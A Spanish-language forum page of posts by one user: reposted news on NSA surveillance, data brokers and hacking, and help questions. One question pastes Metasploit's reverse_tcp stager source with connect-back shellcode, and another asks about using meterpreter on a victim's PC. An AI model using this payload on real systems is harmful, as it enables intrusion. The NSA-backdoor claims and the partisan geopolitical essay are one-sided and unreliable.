Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Mister12

#91
En el marco de la reunión anual del Foro de Democracia Personal, Julian Assange ha advertido a través de videoconferencia que en un futuro próximo todos los aspectos de la vida humana serán controlados con Internet.



El fundador de WikiLeaks, Julian Assange, que participó en el Foro por medio de videoconferencia, sostiene que nuestra generación es la última que capaz de decidir "si Internet es un instrumento de instrucción o de represión de todo el mundo".

"Tendremos la situación [...] cuando cada individuo tenga su número, su ADN conectado al día de nacimiento y en su carné de identidad para controlar el crédito y los impuestos", dice Assange en el video, que ya ha sido subido a Youtube.

En marzo Assange ya auguró un destino tenebroso para las nuevas generaciones, afirmando que vivirían "en un nuevo mundo totalitario", debido a que la Agencia de Seguridad Nacional (NSA) de EE.UU. y el Cuartel General de Comunicaciones del Gobierno (GCHQ) de Reino Unido duplican sus esfuerzos casi cada 18 meses y pronto serán capaces de espiar a todo el mundo.

http://actualidad.rt.com/actualidad/view/130434-assange-internet-represi%C3%B3n-video
#92
La NSA recolecta millones de fotos de los usuarios de Internet para su base de datos


La Agencia de Seguridad Nacional de EE.UU. está recolectando un gran número de fotos de personas de las redes que interceptan a través de sus operaciones mundiales de vigilancia para usarlas en sofisticados programas de reconocimiento facial.

Los documentos filtrados por Edward Snowden revelan que la NSA utiliza el programa de reconocimiento facial para escanear Internet, sacar las fotos y combinarlas con datos de investigaciones, informa el diario 'The New York Times'.

La agencia puede determinar si un sospechoso cuya fotografía o vídeo ha sacado de un chat, tiene un pasaporte válido o averiguar si los informantes han dicho algo acerca de esa persona. Incluso puede detectar cambios sutiles de la apariencia, como la barba o el bigote, y vincular fotos a información de satélites para localizar a alguien. Según los documentos filtrados desde 2011, la NSA descarga aproximadamente 55.000 imágenes al día en su programa con millones de personas identificadas. 

Aunque la misión principal de la NSA es la inteligencia extranjera, no está claro si las fotos de los estadounidenses fueron capturadas en esa base de datos. Al mismo tiempo un portavoz de la NSA dijo que la agencia podría obtener una orden judicial para recoger imágenes de ciudadanos estadounidenses.

http://actualidad.rt.com/actualidad/view/129837-nsa-recolecta-millones-fotos-usuarios-internet-base-datos
#93
Al intentar iniciar sesión en el foro me aparece el mensaje que aparece cuando te banean ya me banearon  una vez por eso los se luego cambie la IP y se me permitió ingresar no he cometido una falta grave a las reglas del foro para ser baneado alguien sabe que pasa
#94
El grupo de 'hacktivistas' Anonymous está preparando un ataque cibernético contra los patrocinadores de la Copa del Mundo de Brasil.



El ataque se realizará en protesta contra el enorme despilfarro en un país donde no todos los ciudadanos tienen acceso a servicios básicos, según explicó un 'hacker' citado por la agencia Reuters.

"Hemos comprobado ya qué páginas son más vulnerables y elaborado el plan de ataque. Esta vez apuntamos a los patrocinadores del Mundial", contó un tal Che Commodore a través de Skype desde un lugar no revelado de Brasil.

A la pregunta sobre los objetivos potenciales, mencionó Adidas, las aerolíneas Emirates, Coca-Cola y Budweiser.

La agencia no pudo averiguar la identidad de Che Commodore ni si sus vínculos con Anonymous son reales.

Esta semana 'hackers' penetraron en el sistema de correo electrónico del Ministerio de Exteriores de Brasil y el colectivo descentralizado Anonymous publicó 333 documentos extraídos de ese sistema.

Los documentos incluyen el resumen de las conversaciones entre varios funcionarios brasileños y el vicepresidente estadounidense Joe Biden durante la visita de este último al país latinoamericano en mayo de 2013, así como un listado de los ministros de deporte que  planean acudir al Mundial. 

http://actualidad.rt.com/actualidad/view/129743-anonymous-ataque-cibernetico-patrocinadores-mundial
#95
Seguramente jamás habrás oido hablar de estas empresas, pero es probable que sepan más sobre ti que compañías más conocidas como Google o Facebook.


"Puede que usted no los conozca, pero ellos lo conocen a usted", advirtió Edith Ramírez, presidenta de la Comisión Federal de Comercio de Estados Unidos.

La gran mayoría de la población ni siquiera sabe que existen. Se trata de los llamados data brokers o agentes o corredores de datos, compañías que se dedican a recabar y vender información personal, generalmente sin consentimiento ni conocimiento de los usuarios.

Los datos son utilizados por otras empresas o agencias para verificar identidades, detectar fraudes, vender productos o dirigir campañas de mercadeo.

¿Ha oido hablar de Acxiom, Corelogic, Datalogix, eBureau, ID Analytics, Intelius, PeekYou, Rapleaf y Recorded Future?"

La Comisión Federal de Comercio de Estados Unidos, FTC por sus siglas en inglés, urgió al Congreso de ese país a aprobar leyes que aseguren mayor transparencia en este sector lucrativo y potencialmente dañino.
En un informe publicado esta semana, la Comisión advirtió sobre posibles abusos por parte de esta industria creciente de compra y venta de información personal.
"Puede que usted no los conozca, pero ellos lo conocen a usted", dijo la presidenta de la Comisión, Edith Ramírez.
"Saben donde usted vive, su salario, su origen étnico, la edad de sus hijos, su estado de salud, sus intereses y sus hobbies".

"En la oscuridad"
EJEMPLOS DE DATOS RECABADOS
Origen étnico, edades de los hijos, estado de salud, créditos, hipotecas, uso de redes sociales, cuentas en internet, préstamos, lugares de vacaciones, marcas preferidas de alimentos
El informe analizó a nueve empresas representativas del sector: Acxiom, Corelogic, Datalogix, eBureau, ID Analytics, Intelius, PeekYou, Rapleaf y Recorded Future.
"Ésta es una industria que opera fundamentalmente en la oscuridad", señaló Ramírez.
La presidenta del FTC advirtió que se trata de empresas no dan cuenta de sus actividades, pero pueden perjudicar a los consumidores.
Los corredores de datos pueden, por ejemplo, categorizar a alguien como un consumidor con mal historial de crédito, o como una persona con problemas de salud que podrían afectar su desempeño laboral, aun si la información en que se basan es incorrecta.
"Otro riesgo es que una empresa de celulares no me dé un contrato porque un agente de datos asegura que he robado la identidad de alguien", afirmó Ramírez.
"Si esto es un error, no tendría ni siquiera cómo saber de dónde surgen los datos para intentar corregir esa información".


Las empresas almacenan trillones de datos que usan para elaborar perfiles de usuarios.

El informe llama al Congreso a aprobar reglas que permitan a los consumidores recurrir a bases de datos centralizadas, donde podrían consultar la información recolectada y corregir errores.
"Los corredores de datos recogen y almacenan trillones de datos sobre casi todos los consumidores de Estados Unidos, que usan para compilar complejos perfiles sobre cada persona", dijo Ramírez.
"Esta información es obtenida de muchas fuentes, desde redes sociales a censos oficiales, tiendas o registros de propiedad. Si un consumidor quisiera hallar la fuente de un dato en su perfil debería navegar por un verdadero laberinto de datos de varias compañías".
Ramírez agregó que las recomendaciones del informe no limitarán la capacidad de estas compañías de "proveer datos, productos y servicios útiles que puedan beneficiar a otras compañias y a la economía en general".
El Centro por una Democracia Digital, Center for Digital Democracy, un grupo de activistas que analiza temas de privacidad en internet, dijo que el informe del FTC era un paso positivo, pero limitado.

El grupo señaló en su blog que el informe es "una llamada de atención poderosa para que despertemos a esta realidad, pero los llamados de la Comisión a una mayor transparencia son insuficientes".
"El verdadero problema es que los corredores de datos, incluyendo a Google y Facebook, se han adherido a un modelo de negocios diseñado para recabar y usar todo lo que sea posible sobre nosotros y nuestros amigos, 24 horas por día siete días a la semana", advirtió el grupo.
"Lo que se requiere es legislación que ayude a contener la marea de prácticas diseñadas deliberadamente para burlar la privacidad de los estadounidenses".


http://www.bbc.co.uk/mundo/noticias/2014/05/140528_datos_corredores_am.shtml
#96

Publicado el 7 de junio de 2013 por WashingtonsBlog y por securitybydefault el 27 junio 2013

En en el esfuerzo del espionaje imponente por el gobierno (esto es mucho más  amplio de lo que usted a oído hasta ahora), Incluso de que el FBI quiere que los programadores de software instalen puertas traseras en todos los software.
Cavando un poco más de información encontramos un artículo de 1999 que nos lleva a una publicación  del sitio web europeo sobre informática "Heise" donde se revelo que la NSA ya había construido  puertas traseras en todas las versiones  de Windows:
Un  descuidado error por parte de los programadores de Microsoft ha revelado que los códigos de acceso especiales preparados por la agencia de  seguridad nacional de  E.E.U.U. se han construido secretamente en Windows. El sistema de acceso de la NSA creado en todas las versiones del sistema operativo de Windows ahora en uso, excepto las primeras versiones del sistema operativo como  las de Windows 95 (y sus predecesores). El descubrimiento se hace luego de las revelaciones a principios de los años 90 sobre  que otro gigante del software de  E.E.U.U. Lotus, en su aplicación 'Lotus Notes' destinada al mercado extranjero, ya había incluido una puerta trasera en su software para hacerle el juego a la NSA.
El primer descubrimiento del  sistema de acceso de la NSA fue hecho a finales de  los años 90 por el investigador británico Dr Nicko van Someren [un experto en seguridad informática ]. Pero fue  solamente algunas semanas después cuando un segundo investigador  de nombre Andrew Fernandez  volvió a descubrir el sistema de acceso. El encontró la evidencia de que el sistema de acceso estaba vinculado a la NSA.

Pero el descubrimiento más mediático vino después: En los años del -mítico- sistema operativo Windows NT 4.0, durante la liberación del service-pack 5, los técnicos de Microsoft olvidaron eliminar los 'símbolos de debug', es decir entregaron los ejecutables y librerías con valiosa información interna que suele estar ahí a efectos de depuración pero que normalmente se suele eliminar en la 'release final'.
A partir de esas 'facilidades', un investigador llamado Andrew Fernandez, verificó la existencia de la primera key descubierta anteriormente (de nombre KEY) y además encontró evidencias de una segunda key (con el nombre NSAKEY), incluso se llegó a hablar de una tercera key
¿Y que se supone que hacían estas claves ocultas en Windows? No he podido encontrar información técnica fiable al respecto, según se lee en el artículo original, hablan de que esas claves se habían encontrado en la dll 'ADVAPI.DLL'
Esta DLL contiene las funciones para muchas muchas cosas que van desde temas criptográficos, permisos a ficheros, gestión de procesos y servicios, y un largo etc.
A partir de esas averiguaciones, la comunidad quedó partida en dos frentes: Los conspiranoicos, (es fácil elaborar teorías relacionando NSA + sistema operativo líder + caso previo Lotus), y por otra parte aquellos que pensaban que todo esto era para añadir funciones criptográficas especiales a sistemas Windows para ser empleados por el gobierno de los EEUU.

Fernandes divulgó su re-descubrimiento de las dos keys de CAPI, y su significado secreto, en la conferencia Crypto 99 ″ llevada a cabo en Santa Barbara. Según los presentes en la conferencia, los desarrolladores de Windows que asistieron a la conferencia no negaron que la key de la "NSA" fuera  construida en su software. Pero se negaron a hablar sobre las funciones de la key, o porqué había sido puesta allí sin conocimiento de los usuarios'.
¡Una tercera llave?!
Pero según dos testigos que assistían a la conferencia, incluso los programadores top de Microsoft estuvieron asombrados sobre que la versión de ADVAPI.DLL enviada con Windows 2000 contenía no dos, keys sino tres
Brian LaMachia, jefe del desarrollo de CAPI en Microsoft se asombro del los descubrimientos echos por personal fuera de El primer descubrimiento de Dr van Someren se basa en  métodos avanzados de búsqueda que prueba y reporta sobre la "entropía" del código de programación.

Fuentes http://www.washingtonsblog.com/2013/06/microsoft-programmed-in-nsa-backdoor-in-windows-by-1999.html

http://www.securitybydefault.com/2013/06/la-supuesta-back-door-de-la-nsa-en.html


#97
He estado intentando con virtual ruoter manage pero al parecer las versiones para windows 7 tienen un bug y no funciona mas es posible compartir internet desde mi pc sin usar estos programas y si es posible como hacerlo

#99
res exagentes de la CIA destilan sus habilidades profesionales en el libro 'Espía la mentira', donde revelan, entre otras cosas, seis señales que una persona nos da inconscientemente para detectar si nos está mintiendo.

Saber detectar si alguien nos miente es una habilidad muy útil tanto en la vida profesional como en la personal, consideran Philip Houston, Michael Floyd y Susan Carnicero, los autores del libro. A continuación les presentamos un resumen que, con la práctica, le ayudará a saber si un colega, su hijo o su pareja le está diciendo la verdad.

1. Pausa conductual o retraso
Cuando usted le hace una pregunta a una persona es muy importante prestar especial atención a la pausa que hace antes de contestar, ya que esos segundos son un indicador para saber si la persona va a mentir o a decir la verdad. Aunque esta pausa conductual depende de muchos factores, con la práctica le podría ayudar a detectar mentiras.

Los autores plantean el siguiente ejercicio: preguntar a un amigo sobre lo qué había él en esta fecha hace siete años. Sin duda, su amigo hará una pausa antes de responder y es probable que sea incapaz de ofrecerle una respuesta. Después pregúntele si en esta fecha, hace siete años, lo asaltaron en una gasolinera. Lo más probable es que no haya pausa y que su amigo responda inmediatamente: "¡No!".

2. Desconexión verbal / no verbal
Nuestro cerebro está diseñado de tal manera que hace que nuestro comportamiento verbal y no verbal coincida de forma natural. Así que cuando hay una desconexión se puede considerar que existe un indicador engañoso potencial. Una desconexión verbal / no verbal común que se debe tener en cuenta es cuando una persona asiente afirmativamente mientras dice "no", o gira la cabeza de lado a lado mientras dice "sí". Una persona que intente engañarle puede cometer este error sin siquiera pensar en ello.

No obstante, hay un par de advertencias a este indicador: la cabeza de una persona puede hacer un movimiento de inclinación cuando dice "no", algo que en algunas ocasiones refleja un simple énfasis; y en segundo lugar, es importante tener en cuenta que en algunas culturas, un movimiento de la cabeza de lado a lado no significa "no", y viceversa.

3. Ocultar la boca o los ojos
Intentar ocultar la boca o los ojos puede ser un indicador de que se está también ocultando la verdad, por lo que hay que prestar atención a si la mano de una persona pasa delante de su boca mientras está respondiendo a una pregunta. Del mismo modo, si una persona protege sus ojos mientras está respondiendo a una pregunta, lo que bien podría estar indicando, en un nivel subconsciente, es que no puede soportar ver la reacción a la mentira que está diciendo. Este blindaje se puede realizar con una mano, o la persona podría incluso cerrar los ojos. Los exexpertos de la CIA apuntan que este indicador no se refiere al parpadeo, pero sí aconsejan fijarse en si una persona cierra sus ojos al tiempo que responde a una pregunta, pues, según ellos, es un indicador de mentira

4. El carraspeo
Si una persona se aclara la garganta antes de responder a la pregunta, es un problema potencial. Si lo hace después de responder, no es significativo, pero si lo hace antes de responder, algo puede estar pasando. Podría estar haciendo el equivalente no verbal de lo verbal "lo juro por Dios...", es decir, viste a la mentira con su mejor traje antes de presentárnosla. Hay que notar también si la pregunta podría haber creado un aumento en la ansiedad, que puede causar incomodidad o sequedad en la boca y la garganta.

5. Manos por la cara
Es necesario observar lo que una persona hace con su rostro o con la cabeza al tratar de responder una pregunta. Es posible que se muerda o se pase la lengua por los labios, o se toque con las manos los labios u orejas. Esto indica que la pregunta ha creado un aumento en la ansiedad por mentir por lo que el sistema nervioso se activa para disipar esa ansiedad, drenando sangre de las superficies de la cara, las orejas y las extremidades, lo que, a su vez, puede crear una sensación de frío o picazón. Sin que la persona ni siquiera se dé cuenta, sus manos se sentirán atraídas hacia esas áreas. Un indicador que nos advierte de que algo no va tan bien.

6. Gestos
Al responder a una pregunta un hombre mentiroso podría ajustarse la corbata o los puños de la camisa, o tal vez las gafas. Una mujer falsa podría ponerse algunos mechones de pelo detrás de la oreja o enderezarse su falda. También pueden secarse el sudor de la frente cuando responden a una pregunta. Muchas veces cuando uno hace una pregunta, nuestro interlocutor mentiroso de repente nota que el teléfono no se enciende de la manera correcta, el vaso de agua está demasiado cerca, o el lápiz no está en el lugar correcto.

http://actualidad.rt.com/sociedad/view/128708-agentes-cia-seis-maneras-detectar-mentir
#100
Qué equipo necesito para poder distribuir señal de tv satelital a través de cable coaxial a miles de usuarios aparte de las antenas satelitales y los receptores y cable coaxial solo he visto desde afuera los puntos de acceso de donde obtienen la señal de tv algunas antenas satelitales y el cableado no he tenido la oportunidad de ver el interior de los puntos de acceso agradecería sus respuestas
#101
Estoy tratando de setear la Ip y el host de my payload en metasploit usando el windows/shell/reverse_tcp despues de ingresar

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=My ip
LPORT=4441 o

Me aparece este mensaje de error:

Error generating the payload: The following options failed to validate: LHOST

La traduccion seria error generando el payload : Las siguientes opciones fallaron al validar: LHOST

A que se deve esos mensajes de error y como solucionarlo?

Buscando en google encontre lo siguiente lo cual me hace pensar que con una midificacion en el codigo fuente de los payload se podria solucionar pero no soy experto en programacion y necesito de su ayuda

Esto fue lo que encontre:

Este es el codigo de un exploit recopilado


Si se deja el codigo como esta dara el error de validcion de LHOST



Despues de corregir el codigo tendria que quedar haci



El codigo del los payload de metasploit son como este

Citar##
# $Id: reverse_tcp.rb 14774 2012-02-21 01:42:17Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'
require 'msf/core/handler/reverse_tcp'


module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Windows

  def initialize(info = {})
     super(merge_info(info,
        'Name'          => 'Reverse TCP Stager',
        'Version'       => '$Revision: 14774 $',
        'Description'   => 'Connect back to the attacker',
        'Author'        => ['hdm', 'skape', 'sf'],
        'License'       => MSF_LICENSE,
        'Platform'      => 'win',
        'Arch'          => ARCH_X86,
        'Handler'       => Msf::Handler::ReverseTcp,
        'Convention'    => 'sockedi',
        'Stager'        =>
           {
              'RequiresMidstager' => false,
              'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] },
              'Payload' =>
                 # Length: 290 bytes
                 "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
                 "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
                 "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
                 "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
                 "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
                 "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
                 "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
                 "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
                 "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
                 "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
                 "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
                 "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
                 "\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
                 "\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
                 "\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
                 "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
                 "\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
                 "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
                 "\xEC\xC3"
           }
        ))


  end

end                                                                                      

No tengo idea donde tendria que modificar
#102
Cuidado con las aplicaciones de banca móvil: pueden ser 'hackeadas' usando incluso programas que están en Internet y son gratis, afirma un experto de seguridad.



Para 'crackear' (romper el sistema de seguridad) las aplicaciones bancarias los piratas usan ingeniería inversa: un proceso que permite, analizando un programa, determinar cómo está hecho y cómo funciona, explicó al periódico 'Daily Mail' Winston Bond, de la empresa de seguridad Arxan Technologies.

Los programadores suelen usar ingeniería inversa para obtener el código fuente de un programa con el objetivo de encontrar errores y eliminarlos. Los 'hackers' obtienen el código fuente para revelar cómo funciona una aplicación y cómo realiza ciertas tareas.

Los 'hackers' pueden cambiar el código fuente, haciendo que la aplicación, por ejemplo, se conecte al servidor pirata, revele las contraseñas a los 'hackers' o transmita dinero a su cuenta al mismo tiempo que el cliente del banco realiza un pago.

Winston Bond demostró a 'Daily Mail' que todo esto es posible creando una aplicación como ejemplo y pirateándola, lo que le permitió obtener las contraseñas de los usuarios y transferir dinero a su cuenta.

Todo ello se puede realizar usando instrumentos que están en Internet y son gratis. En la Red incluso hay videos que explican cómo obtener el código fuente del software, subrayó Bond.

Los teléfonos que usan Android son más fáciles de 'hackear' que los iPhones, excepto los iPhones en los que se hizo un 'jailbreak', es decir, 'hackearon' la configuración original de fábrica para evitar las restricciones impuestas por Apple, dijo Bond.

http://actualidad.rt.com/actualidad/view/129040-hackear-banca-movil-android
#103
He buscado en youtube y solo encontre un tutorial de como hacerlo pero con un archivo .bat usando winrar  puedo hacer esto con algotro archivo que tenga algotro formato como algun archivo .exe ?
#104
La compañía británica CeX instalará un cajero electrónico especial en una de sus tiendas en Escocia para que sus usuarios puedan vender bienes de segunda mano que se pagarán con bitcoin.
La Unión Europea decidió que datos irrelevantes o desactualizados obtenidos al utilizar el buscador de Google tendrán que ser removidos. Quienes critican esta medida consideran que es equivale a censurar.
Y Samsung acepta compensar a los trabajadores de una de sus fábricas en Corea del Sur que desarrollaron leucemia.
Esto y más en BBC Mundo Tecnológico.

http://www.bbc.co.uk/mundo/video_fotos/2014/05/140516_video_click_16_05_14.shtml
#105
Otro documento clasificado de la Agencia de Seguridad Nacional del vasto archivo filtrado por Edward Snowden revela la verdadera escala del espionaje israelí a EE.UU.



El documento, revelado por el periodista estadounidense Glenn Greenwald en el marco de la publicación de su libro de memorias, 'No hay lugar para esconderse: Edward Snowden, la NSA y el Estado de Vigilancia de EE.UU.' ('No Place to Hide: Edward Snowden, the NSA and the U.S. Surveillance State'), resume la complicada relación de seguridad entre Jerusalén y Washington en un solo párrafo, que publicó la revista 'The Newsweek'.

"Los israelíes son extraordinariamente buenos socios para nosotros", observó la NSA refiriéndose a los programas de espionaje electrónicos conjuntos contra objetivos extranjeros. "Pero por otra parte, se dirigen contra nosotros para saber nuestras posiciones sobre los problemas de Oriente Medio", destacó.

El archivo agrega que la 'Estimación Nacional de Inteligencia de 2013 sobre las amenazas cibernéticas', un informe elaborado por la CIA, ha puesto a Israel en uno de los primeros lugares en la lista de servicios de inteligencia más agresivos en contra de EE.UU.

Mientras que en el Senado se estudia un proyecto de ley para reducir las restricciones de visados para los israelíes, algunos funcionarios de la seguridad nacional de EE.UU. todavía se oponen a relajar las restricciones a los ciudadanos israelíes que quieren visitar el país norteamericano "por la preocupación de permitir la entrada en el país a los espías israelíes".

Un ex alto cargo de la inteligencia de EE.UU, afirmó que el tema es "radioactivo" y que la inteligencia israelí se hizo mucho más cautelosa, sutil y sofisticada después de la detención de Jonathan Pollard en 1985 bajo la acusación de espionaje para Israel.

A principios de año, Glenn Greenwald, que fue el primero en publicar las filtraciones de Edward Snowden, informó en una entrevista con la cadena israelí Channel 10 que el extécnico de la CIA tiene más secretos que desvelar en relación con Israel. Asimismo, el periodista destacó que el encarcelamiento de Jonathan Pollard, un exoficial de inteligencia estadounidense condenado a prisión en EE.UU. por espiar para Israel, da fe de la hipocresía existente en el Gobierno estadounidense. En su opinión, la administración de Obama hace exactamente aquello de lo que después acusa a sus enemigos de hacer. 

http://actualidad.rt.com/actualidad/view/128358-documento-nsa-snowden-espionaje-israel-eeuu
#106
Que pasa si al momento de comprometer una pc con algún exploit el atacante no está conectado a internet y no tiene meterpreter abierto

Qué pasa si se logra comprometer una pc pero al momento de  infectar  la pc de la victima la pc del atacante no está conectada a internet es posible explorar después la pc comprometida con meterpreter
#107

Mucho se habla en estos tiempos de lo que sucede en Damasco, Kiev, Pyongyang, Sudan, Caracas o El Cairo. Los grandes medios y el ejército de analistas que lo componen, tratan de descifrar o manipular los acontecimientos, pero sin que muchos lo perciban, incluyendo a los propios rusos, estamos siendo espectadores de un acontecimiento que debe tener una transcendencia universal – LA TOMA DE MOSCU.

Parece un poco espectacular esta aseveración y hasta tremendista, al estilo de la "Guerra de los Mundos", pero se hace necesario hacer una lectura realista de lo que está pasando y a donde apuntan los hechos, no las palabras. Para ello lo primero que debemos hacer es dejar a un lado el lenguaje que nos impone occidente a través de los medios y las declaraciones reiteradas de sus personeros y que desvirtúan no solo los acontecimientos, sino y hasta la propia compresión de estos y hacia donde nos llevan.

Para comprender que significa el "cambio de lenguaje", podemos considerar algunos ejemplos:

Occidente nos ha tratado de vender la idea de que Iraq, Libia, Sudan, Kosovo, etc, son movimientos (inclusive se emplea el termino revoluciones), que pretenden canalizar la "ansias de libertad y democracia" de estos pueblos. Durante un tiempo llovieron los artículos y materiales presentando a los líderes de estos países como bestias sangrientas que "oprimían" a sus pueblos. Al final forzaron los cambios, con no poca participación de fuerzas y recursos externos. Deberíamos preguntarnos ¿Qué está pasando en estos países ahora? ¿Hay algún tipo de democracia en ellos?
En Kiev un grupo de fascistas se lanzó a la violencia y genero disturbios con marcado carácter desestabilizador, inclusive después de acordado con occidente un proceder para solucionar el "problema", incumplieron los acuerdos y se aprovecharon de la retirada de las fuerzas del orden para asaltar, al más puro estilo del Western americano, las instituciones de gobierno, provocando un clásico golpe de estado que occidente enseguida reconoció con el eufemístico epíteto de "revolución auténtica". En Crimea el pueblo define en las calles su deseo de no ser parte de la payasada occidental en Kiev y su parlamento vota una resolución solicitando la anexión a Rusia, entonces nos presentan este acto como un golpe de estado inaceptable para la "comunidad internacional" y se aprestan a tomar represalias contra quienes lo apoyan. Por cierto en la misma fecha en que se realiza el referéndum en Crimea se está desarrollando un acto idéntico en Venecia, pero nadie habla de ello.
Pudiéramos poner muchos ejemplos más donde es evidente como se nos define de forma distinta un mismo hecho o se nos presentan otros como en realidad no ocurren.

Lo más importante es que a pesar de los evidente pasos que está dando occidente y su coalición, los rusos y los chinos siguen jugando a la "asociación constructiva"  y su principal problema radica en que el análisis de los acontecimientos lo hacen considerando el punto de vista occidental, para dar una imagen falsa de "estar en la misma cuerda", cuando en realidad la cuerda esta alrededor de su cuello.

La verdadera estrategia de EE.UU y sus aliados consiste en mantener a los rusos y chinos en un perfil bajo y hacerles creer que ellos son sus socios cuando en realidad están tratando de estrangularlos.

En el caso de los chinos se emplea la versión "japonesa" empleada por EE.UU contra Japón después de la Segunda Guerra Mundial  consistente en hacerles creer que eran sus socios y que los apoyarían en su desarrollo económico, lo cual sería suficiente para lograr el largo anhelo nipón de ser un "imperio".  Los japoneses lograron un desarrollo vertiginoso desde el punto de vista económico, pero en imperio nunca se convirtieron. Es más, cuando a EE.UU le convino y consideró que la competitividad japonesa estaba lesionando sus intereses, utilizó su verdadero control sobre esa economía y la devaluó al rango de "no peligrosa", obligando a los japoneses a bajar su perfil.

Ahora se emplea la misma estrategia con China y estos viven la ilusión de que son una potencia económica, cuando en realidad se han convertido en lo que muchas veces  menciono el líder Chino Mao Tse Tung, en un "Gigante con pies de barro".

Recientemente China declaró que en caso de que EE.UU mantenga la actual presión sobre Moscú por su actitud en el conflicto ucraniano, exigirán el pago de sus obligaciones de deuda en oro, lo que produciría un derrumbe financiero en dicho país. Esto no pasa de ser una bravuconada imposible de ejecutar.

El problema consiste en que esta acción provocaría un derrumbe estrepitoso del dólar lo que al final solo favorecería a los norteamericanos, pues afectaría en primer término a las economías que poseen superávit y grandes reservas en dólares, las que se esfumarían de inmediato, por su parte para EE.UU inmerso en un espiral de deudas interminable e impagable, significaría la "devaluación" de dicha obligación financiera lo que le seria desesperadamente conveniente.

La economía China es tan dependiente de las transnacionales, que cuando EE.UU lo estime conveniente, la devaluará al nivel manejable para que no afecte sus intereses.

Con los rusos la historia es otra, pues a pesar de todos sus tropiezos son en realidad el peligro más evidente para la implantación de la hegemonía estadounidense a nivel global.

Es por ello que, si bien EE.UU ha montado un muro de contención en la zona Asia-Pacifico, alrededor de Rusia está incendiando a todos los aliados y vecinos con el evidente objetivo de quitarle a los rusos el apoyo de estos, lo que invariablemente los devaluara a la categoría de gran país, en lugar de gran potencia, disminuirá su influencia internacional de forma drástica y adecuada para en su momento lanzarse al asalto de Moscú, donde convendría instalar a un tío del estilo de Boris Yeltsin, adicto a libaciones espirituosas de "samagonka" (vodka casero) y otras sustancias no identificadas.

Ucrania es un claro ejemplo de esta estrategia debido por un lado a la cercanía de Rusia y por otro a lo que significa desde el punto de vista militar y psicológico un cambio en la dirección de Kiev.

El aspecto militar aunque se toca con prudencia tiene una significación clave en este asunto. No solo porque en los puertos ucranianos de Sevastopol y Yalta tienen los rusos sus bases sureñas de la flota rusa que cubren como zona de responsabilidad el Mediterráneo y cuya pérdida significaría un duro golpe para su necesaria y estratégica presencia en esta convulsa zona, sino y por el evidente papel que Bielorrusia y Ucrania significan para el sistema defensivo ruso que fungen como un cordón de seguridad que les permite fundamentalmente disminuir la eficiencia del sistema de ataque y respuesta montado en los países miembros de la OTAN.

En términos técnicos esto se explica porque los sistemas de defensa antiaérea se escalonan en altura y distancia. Los rusos pueden escalonar en altura su sistema, pero si Ucrania se convierte en una plataforma para amenazar a Rusia -y va por ese camino – el escalonamiento por distancia se reduciría a casi nada pues el trayecto entre las fronteras ucranianas y Moscú es de aproximadamente  500 kms.

Por otro lado para nadie es un secreto que EE.UU ha "adelantado" sus "defensas", poniendo casi en las narices de Rusia sus sistemas antiaéreos, lo que los convierte en ofensivos pues pueden controlar y "atacar" a la aviación y misiles rusos en el momento de despegue.

Cabe esperar que en cuanto Washington logre instalar su "Gobierno" en Kiev uno de los primeros acuerdos será expulsar a la flota rusa de sus puertos en el Mar Negro, instalar en ellos a sus buques para amenazar el suroeste ruso e instalar un sistema antimisil en la frontera ucraniano-rusa para garantizar una envidiable ventaja estratégica, fundamentalmente en su escalonamiento en distancia.

Prácticamente ningún avión podrá despegar de los aeropuertos en la zona europea de Rusia sin estar bajo el control de los sistemas antiaéreos norteamericanos. De más está decir que esto ni remotamente pueden lograrlo los rusos.

Muchos pensaran en que esto no tiene importancia, pues de todas formas el uso del armamento nuclear es incompatible con la vida humana y cualquier contienda de ese tipo, no importa donde detonen estos artefactos provocaría la destrucción global, de los "ganadores" y los "perdedores".

El problema consiste en hacerse la pregunta correcta, de ser así entonces ¿Para qué EE.UU insiste en el constante acercamiento de sus sistemas antimisiles a las fronteras rusas, lo cual se evidencia en las instalaciones existentes en Polonia, Rumania y la Republica Checa?

